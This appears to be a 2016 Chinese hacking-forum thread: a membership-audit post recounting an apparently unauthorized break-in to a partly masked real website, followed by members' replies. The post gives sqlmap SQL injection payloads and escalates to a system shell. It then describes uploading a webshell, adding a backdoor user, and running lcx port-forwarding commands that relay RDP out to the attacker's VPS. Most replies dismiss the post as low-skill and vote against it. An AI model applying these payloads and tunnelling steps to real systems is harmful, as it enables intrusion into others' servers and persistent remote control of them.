九零»90WiKi - 90Sec Team --== 资料库==-- 账号审核 {Account audit} 【未转正】一次顺利内网测试
12下一页
返回列表

[【未通过】] 【未转正】一次顺利内网测试

[复制链接]
Le0nis 发表于 2016-7-23 08:44:50 | 显示全部楼层 |阅读模式

正式成员|主题 |帖子 |积分 10

0x01
首先发现目标
http://xxxxx/themes/list.php?id=86存在sql注入(某乌云厂商)
---
Parameter: id (GET)
    Type:boolean-based blind
    Title: ANDboolean-based blind - WHERE or HAVING clause
    Payload: id=86AND 4127=4127

    Type:error-based
    Title: MySQL>= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=86AND (SELECT 8388 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT(ELT(8388=8388,1))),0x71706a7171,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/ORtime-based blind
    Title: MySQL>= 5.0.12 AND time-based blind (SELECT)
    Payload: id=86AND (SELECT * FROM (SELECT(SLEEP(5)))fkAj)

    Type: UNIONquery
    Title: GenericUNION query (NULL) - 16 columns
   Payload: id=86 UNION ALL SELECTNULL,CONCAT(0x7176627071,0x6c4361515457676a6b51,0x71706a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


大量数据
发现是dba权限


执行—os-shell
执行命令
system权限
上传点
上传webshell
链接菜刀
新建一个用户
wooyun
不能远程连接
我需要端口转发
准备工具
lcx

肉鸡端
执行lcx.exe -slave 你的IP 2333 127.0.0.1 3389
在远程vps上
执行
./lcx –m2 –p1 2333 –p2 3389
http://oansleg1g.bkt.clouddn.com/error.png
我们再远程连接我们vps的ip地址的3389端口成功
内网
http://oansleg1g.bkt.clouddn.com/neiwang002.png
单选投票, 共有 56 人参与投票

投票已经结束

 7.14% (4)
0.00% (0)
0.00% (0)
1.79% (1)
91.07% (51)
您所在的用户组没有投票权限
回复

举报

 楼主 Le0nis 发表于 2016-7-23 08:49:15 | 显示全部楼层

正式成员|主题 |帖子 |积分 10

这编辑器 真心不好用 管理员我不是恶意修改投票的 一编辑就成这样子了。
回复

举报

kokxxoo 发表于 2016-7-23 09:47:27 | 显示全部楼层

正式成员|主题 |帖子 |积分 173

那来的那多通过
回复

举报

 楼主 Le0nis 发表于 2016-7-23 09:57:05 | 显示全部楼层

正式成员|主题 |帖子 |积分 10

kokxxoo 发表于 2016-7-23 09:47
那来的那多通过

一编辑 就成这样子了

回复

举报

kokxxoo 发表于 2016-7-23 10:28:10 | 显示全部楼层

正式成员|主题 |帖子 |积分 173

Le0nis 发表于 2016-7-23 09:57
一编辑 就成这样子了


回复

举报

Exploit_小宇 发表于 2016-7-23 10:39:11 | 显示全部楼层

正式成员|主题 |帖子 |积分 151

未发现技术性的亮点
回复

举报

斯杰 发表于 2016-7-23 10:39:44 | 显示全部楼层

正式成员|主题 |帖子 |积分 189

我是通过通过通过通过还是不通过呢?

评分

参与人数 1酒票 -1 收起 理由
管理05 -1 请勿灌水

查看全部评分

回复

举报

474082729 发表于 2016-7-23 10:51:24 | 显示全部楼层

正式成员|主题 |帖子 |积分 108

这就是所谓的内网渗透/?????
回复

举报

Silence7 发表于 2016-7-23 12:00:24 | 显示全部楼层

正式成员|主题 |帖子 |积分 20

就一个vps  还内网渗透 ==
回复

举报

酷帥王子 发表于 2016-7-23 13:31:31 | 显示全部楼层

正式成员|主题 |帖子 |积分 281

标题党哈哈,我放弃投票
回复

举报

komas 发表于 2016-7-23 15:31:52 | 显示全部楼层

正式成员|主题 |帖子 |积分 169

做过什么内网动作吗....
回复

举报

Luan 发表于 2016-7-23 17:05:44 | 显示全部楼层

正式成员|主题 |帖子 |积分 47

这就是内网渗透了...
回复

举报

Bsmali4 发表于 2016-7-23 18:08:44 | 显示全部楼层

正式成员|主题 |帖子 |积分 393

怎么说呢,比较同情你。90sec大神超多,标题党的嫌疑太重了。楼主继续加油,我投了支持票
回复

举报

roisatm 发表于 2016-7-23 18:35:48 | 显示全部楼层

正式成员|主题 |帖子 |积分 46

内网呢。。。
回复

举报

v5est0r 发表于 2016-7-23 19:22:49 | 显示全部楼层

正式成员|主题 |帖子 |积分 145

亲这并不是内网呀
回复

举报

Edison 发表于 2016-7-23 21:42:59 | 显示全部楼层

正式成员|主题 |帖子 |积分 81

首先我也是菜鸟,平时工作也比较忙,苦逼的搬砖族,这个只是我的兴趣爱好。
90确实大神比较多,可是他也是新手,他技术高的话早就提交文章注册了,哪用得着这样的注册机会。个人建议给新鲜血液给点学习的机会。
回复

举报

ussqlmap 发表于 2016-7-23 22:12:40 | 显示全部楼层

正式成员|主题 |帖子 |积分 132

...这仅仅只是提权吧 说好的内网呢
回复

举报

cnqing 发表于 2016-7-23 22:24:46 | 显示全部楼层

正式成员|主题 |帖子 |积分 101

就是拿一个注入点来提交  没看点 故于不通过
回复

举报

ro0kie 发表于 2016-7-23 22:52:03 | 显示全部楼层

正式成员|主题 |帖子 |积分 124

这叫什么技术帖子
回复

举报

unitial 发表于 2016-7-23 23:54:50 | 显示全部楼层

正式成员|主题 |帖子 |积分 22

运气也是实力的一部分,但是这个标题。。。
回复

举报

pandas 发表于 2016-7-24 08:50:05 | 显示全部楼层

正式成员|主题 |帖子 |积分 177

其实改下名字会更好点 九零比较低调因此不喜欢这些浮夸的标题
回复

举报

小莫 发表于 2016-7-24 14:37:03 | 显示全部楼层

正式成员|主题 |帖子 |积分 77

Silence7 发表于 2016-7-23 12:00
就一个vps  还内网渗透 ==

其实我觉得人家么有想说是内网渗透,人家就说是内网测试,,,服务器在内网就可以了嘛。我同意那位兄台的意见,毕竟这个东西还是放宽点,人家也是等着开放注册,然后写个帖子,如果水平够的话  早就注册了。
回复

举报

Silence7 发表于 2016-7-24 20:06:56 | 显示全部楼层

正式成员|主题 |帖子 |积分 20

小莫 发表于 2016-7-24 14:37
其实我觉得人家么有想说是内网渗透,人家就说是内网测试,,,服务器在内网就可以了嘛。我同意那位兄台的 ...

0-0  我想说有点标题党的意思
回复

举报

L34Rn 发表于 2016-7-26 11:26:46 | 显示全部楼层

九零元老|主题 |帖子 |积分 123

尴尬。。
回复

举报

wilson 发表于 2016-7-26 16:20:28 | 显示全部楼层

九零元老|主题 |帖子 |积分 251

虽然没啥技术含量,但是还是鼓励一下吧。加油骚年
回复

举报

下一页 »
12下一页
返回列表
快速回复 返回顶部 返回列表